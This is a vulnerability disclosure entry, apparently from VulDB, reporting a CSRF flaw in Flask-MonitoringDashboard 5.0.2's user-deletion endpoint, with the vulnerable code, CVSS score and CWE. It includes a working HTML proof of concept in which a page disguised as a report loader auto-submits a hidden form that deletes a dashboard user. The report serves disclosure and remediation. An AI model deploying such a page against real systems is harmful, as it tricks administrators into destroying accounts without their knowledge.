| Título | flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF |
|---|
| Descripción | # CSRF Vulnerability in User Deletion (/api/user/delete)
## Summary
A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the dashboard user-deletion endpoint `/api/user/delete`. The lack of CSRF protection allows an attacker to force an authenticated administrator to delete dashboard users without authorization.
## Vulnerability Details
### Configuration-Level Issue
**File**: `flask_monitoringdashboard/core/auth.py`
```python
def admin_secure(func):
@wraps(func)
def wrapper(*args, **kwargs):
if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization
if session.get(config.link + '_admin'):
return func(*args, **kwargs)
return redirect(url_for(config.blueprint_name + '.login'))
return wrapper
# ❌ No CSRF protection anywhere in the package
# ❌ Session cookie has no SameSite attribute enforced
```
### Endpoint-Level Code Analysis
**File**: `flask_monitoringdashboard/views/auth.py` (Lines 62-71)
```python
@blueprint.route('/api/user/delete', methods=['POST'])
@admin_secure
def user_delete():
"""Delete the user in the database."""
user_id = int(request.form['user_id'])
# ❌ No CSRF token validation
# ❌ No Origin/Referer verification
if flask.session.get(config.link + '_user_id') == user_id:
return jsonify({'message': 'Cannot delete itself.'}), BAD_REQUEST_STATUS
with session_scope() as session:
session.query(User).filter(User.id == user_id).delete() # ⚠️ deletes user
return 'OK'
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ❌ No origin verification
3. ⚠️ Deletes an arbitrary user (by `user_id`) based only on the session cookie
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Loading report...</title>
</head>
<body>
<h2>???? Generating your weekly report...</h2>
<form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/user/delete" method="POST">
<input type="hidden" name="user_id" value="2">
</form>
<script>
setTimeout(function() {
document.getElementById('csrf-form').submit();
}, 1000);
</script>
</body>
</html>
```
## Impact
**Unauthorized user deletion** - An attacker can remove dashboard users (e.g. other
administrators), disrupting access and monitoring. Combined with ISSUE_01, an attacker
can delete legitimate admins after planting their own.
---
**CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
**CWE**: CWE-352 (Cross-Site Request Forgery)
---
**Reported by**: flashzyc
**Date**: 2026-06-07
|
|---|
| Fuente | ⚠️ https://github.com/flask-dashboard/Flask-MonitoringDashboard/issues/558 |
|---|
| Usuario | flashzyc (UID 92850) |
|---|
| Sumisión | 2026-06-07 08:59 (hace 1 mes) |
|---|
| Moderación | 2026-07-08 09:38 (1 month later) |
|---|
| Estado | Duplicado |
|---|
| Entrada de VulDB | 376785 [flask-dashboard Flask-MonitoringDashboard hasta 5.0.2 falsificación de solicitudes en sitios cruzados] |
|---|
| Puntos | 0 |
|---|